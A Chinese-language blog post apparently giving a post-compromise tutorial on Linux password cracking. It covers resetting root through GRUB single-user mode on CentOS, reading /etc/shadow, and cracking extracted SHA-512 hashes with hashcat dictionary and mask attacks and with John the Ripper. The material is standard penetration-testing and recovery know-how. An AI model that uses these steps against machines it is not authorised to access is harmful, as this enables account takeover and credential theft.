linux密码破解

关于获取linux机器后,破解密码。。。

物理破解

直接把电脑搬过来

7的centos

直接重启在开机界面的grub下按e,单用户进入,看出现的情况来

centos是在linux的那一段然后把

ro改成rw init=/sysroot/bin/sh

然后ctrl+x

然后访问系统

chroot /sysroot

修改密码

passwd root

更新系统信息并命令

touch /.autorelabel
退出exit
重启reboot

就行

6的centos

按esc

a

1

进入单用户模式

然后gg

其他的centos

按e进入菜单编辑模式

进入kernel

按e

按1单用户模式然后回车

然后passwd root

查看用户组

cat /etc/group

工具破解

win的哈希比linux的简单,win可以通过hashcat获取明文、密码哈希散列设置信任从而控制文件服务器等,linux...

/etc/passwd用户账户配置文件,保存账户的基本信息

root:x:0:0:root:/root:/bin/bash

{用户名}:{密码}:{UID}:{GID}:{注释性描述}:{宿主目录}:{命令解释器}

可以通过/bin/bash看有几个权限用户

bin:*:18505:0:99999:7:::
  • 密码字符串为*,表示系统用户不能被登入
  • 密码字符串为!,表示用户名被禁用
  • 密码字符串为空,则表示没有密码

密码配置文件/etc/shadow

:表示分割

$id$salt$encrypted

root:$6$7vXyCOws$Hp/xoGf50Kov51cy83h6CTYoQerInkAFWWYZL22640N6P0kgy9Gfy4NVndDa1hNUevqR122E7ykmA1BIIOg0C.:16821:0:99999:7:::
提取一下就是
$6$7vXyCOws$Hp/xoGf50Kov51cy83h6CTYoQerInkAFWWYZL22640N6P0kgy9Gfy4NVndDa1hNUevqR122E7ykmA1BIIOg0C.
6表一种类型标记为6的密码散列
7vXyCOws salt值
Hp/xoGf50Kov51cy83h6CTYoQerInkAFWWYZL22640N6P0kgy9Gfy4NVndDa1hNUevqR122E7ykmA1BIIOg0C.:
hash值

$0 = DES 或者明文开头无标记

$1 = MD5

$2a(2y) = Blowfish

$5 = SHA-256

$6 = SHA-512

hashcat

默认额hash 512

最后一个shadow的用户信息可以使用

tail -n 1 /etc/shadow > cc.hash

直接对$id$salt$encrypted进行保存作为单个行

vim对:进行删除

然后

字典破解

hashcat -m 1800 -a 0 -o find.txt hash文件位置 字典
可以使用john的/usr/share/john/password.lst
根据help手册确定hash类型

暴力破解

hashcat -m 1800 -a 3 -o find.txt  hash绝对路径  密码设置  --force

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !”#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 – 0xff

也可以破解文件密码

使用rar2john

还有office2john

但没有强大的算法还是算了

john

先组合passwd和shadow然后合成一个文件

unshadow /etc/passwd /etc/shadow > chenyouxiu_pass

然后自带字典破解

john chenyouxiu_pass

看过程

john --show chenyouxiu_pass

2021-08-19 15-41-40 的屏幕截图

可以看出很快就破解了root的roottoor

使用自己的字典

john --wordlist=    chenyouxiu_pass

直接破解shadow文件

john  shadow文件的绝对路径
cmd5网站破解

参考链接:https://www.cnblogs.com/yjxing/p/11507575.html
hashcat文档说明

posted @ 2021-08-19 17:04  testadm1n  阅读(455)  评论(0编辑  收藏  举报